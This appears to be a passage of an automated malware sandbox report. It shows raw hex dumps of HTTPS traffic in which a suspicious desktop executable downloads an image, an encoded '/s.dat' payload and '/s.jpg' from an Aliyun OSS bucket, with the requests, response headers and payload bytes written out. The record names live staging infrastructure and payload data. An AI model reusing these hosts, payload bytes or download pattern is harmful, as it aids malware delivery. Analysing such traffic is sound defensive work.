                                                                                                              2025-01-11 03:42:24 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                                                              Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                                                              Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                                                                                              Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                                                                                              Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                                                                                              Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                                                                                              Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                                                                              Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                                                                              Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                                                                              2025-01-11 03:42:24 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                                                                              Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.84971439.103.20.1054431824C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:33 UTC111OUTGET /s.dat HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:33 UTC559INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:33 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 28272
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8A972AE9E35302ABC60
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "6D793DEEE57502B69E89D0D15BEB4BD8"
                                                                                                              Last-Modified: Sat, 11 Jan 2025 03:42:21 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 6756283170469504006
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000113
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: bXk97uV1AraeidDRW+tL2A==
                                                                                                              x-oss-server-time: 7
                                                                                                              2025-01-11 03:42:33 UTC3537INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                                                                              Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                                                                              2025-01-11 03:42:33 UTC4096INData Raw: 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 92
                                                                                                              Data Ascii: ##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                                                                              2025-01-11 03:42:33 UTC4096INData Raw: 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc 3c
                                                                                                              Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH<
                                                                                                              2025-01-11 03:42:33 UTC4096INData Raw: 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 0b
                                                                                                              Data Ascii: JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                                                                                              2025-01-11 03:42:33 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                                                                              Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                                                                              2025-01-11 03:42:33 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                                              Data Ascii: ,$LDld=5}u]U
                                                                                                              2025-01-11 03:42:33 UTC4096INData Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed
                                                                                                              Data Ascii: <EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                                                                              2025-01-11 03:42:33 UTC159INData Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 9f 16 ec 9f
                                                                                                              Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.84971539.103.20.1054431824C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:35 UTC111OUTGET /s.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:35 UTC544INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:35 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 8299
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8AB35EB263738148279
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                                                                              Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 692387538176721524
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000104
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                                                                              x-oss-server-time: 25
